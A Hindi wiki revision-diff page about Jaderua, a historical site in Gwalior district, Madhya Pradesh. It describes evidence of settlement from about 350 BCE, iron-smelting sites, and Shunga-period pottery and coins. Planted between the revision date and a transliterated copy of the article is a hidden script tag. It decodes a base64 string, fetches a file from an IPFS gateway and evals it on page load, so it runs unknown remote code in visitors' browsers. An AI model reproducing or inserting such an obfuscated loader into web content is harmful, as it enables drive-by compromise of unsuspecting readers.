Difference between revisions of "जदेरूआ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{पुनरीक्षण}} *जदेरूआ एक ऐतिहासिक स्थान यह स्थान [[मध्य...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
 
{{पुनरीक्षण}}
 
{{पुनरीक्षण}}
*जदेरूआ एक ऐतिहासिक स्थान यह स्थान [[मध्य प्रदेश]] के [[ग्वालियर|ग्वालियर ज़िले]] में स्थित है। लगभग 350 ई.पू. से दूसरी शताब्दी ई.पू. के बीच यहाँ आबादी के साक्ष्य मिले हैं।  
+
*जदेरूआ एक ऐतिहासिक स्थान यह स्थान [[मध्य प्रदेश]] के [[ग्वालियर|ग्वालियर ज़िले]] में स्थित है।  
*जदेरूआ लोहे के हथियारों से समृद्ध है और यहाँ लोहे गलाने के अनेक स्थल मिले हैं।  
+
*लगभग 350 ई.पू. से दूसरी शताब्दी ई.पू. के बीच जदेरूआ में आबादी के साक्ष्य मिले हैं।  
*शुंगकालीन मृण्मय वस्तुएँ, नागों के सिक्के तथा [[तांबा|तांबे]] के अन्य सिक्के प्राप्त हुए हैं। ऐसा ज्ञात होता है कि ई.पू. दूसरी शताब्दी के पश्चात यह स्थान वीरान हो गया और लगभग ईसा की नवीं शताब्दी में फिर आबाद हुआ।  
+
*जदेरूआ [[लोहा|लोहे]] के हथियारों से समृद्ध है और यहाँ लोहे गलाने के अनेक स्थल मिले हैं।  
 +
*शुंगकालीन मृण्मय वस्तुएँ, [[नाग|नागों]] के सिक्के तथा [[तांबा|तांबे]] के अन्य सिक्के प्राप्त हुए हैं। ऐसा ज्ञात होता है कि ई.पू. दूसरी शताब्दी के पश्चात यह स्थान वीरान हो गया और लगभग ईसा की नवीं शताब्दी में फिर आबाद हुआ।  
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
Line 11: Line 12:
  
 
==संबंधित लेख==
 
==संबंधित लेख==
 +
{{मध्य प्रदेश के ऐतिहासिक स्थान}}
 +
[[Category:मध्य प्रदेश के ऐतिहासिक नगर]]
 +
[[Category:मध्य_प्रदेश]]
 
[[Category:ऐतिहासिक स्थान कोश]]
 
[[Category:ऐतिहासिक स्थान कोश]]
 
[[Category:नया पन्ना]]
 
[[Category:नया पन्ना]]
 
__INDEX__
 
__INDEX__

Revision as of 06:23, 4 July 2011

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

  • jaderooa ek aitihasik sthan yah sthan madhy pradesh ke gvaliyar zile mean sthit hai.
  • lagabhag 350 ee.poo. se doosari shatabdi ee.poo. ke bich jaderooa mean abadi ke sakshy mile haian.
  • jaderooa lohe ke hathiyaroan se samriddh hai aur yahaan lohe galane ke anek sthal mile haian.
  • shuangakalin mrinmay vastuean, nagoan ke sikke tatha taanbe ke any sikke prapt hue haian. aisa jnat hota hai ki ee.poo. doosari shatabdi ke pashchat yah sthan viran ho gaya aur lagabhag eesa ki navian shatabdi mean phir abad hua.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh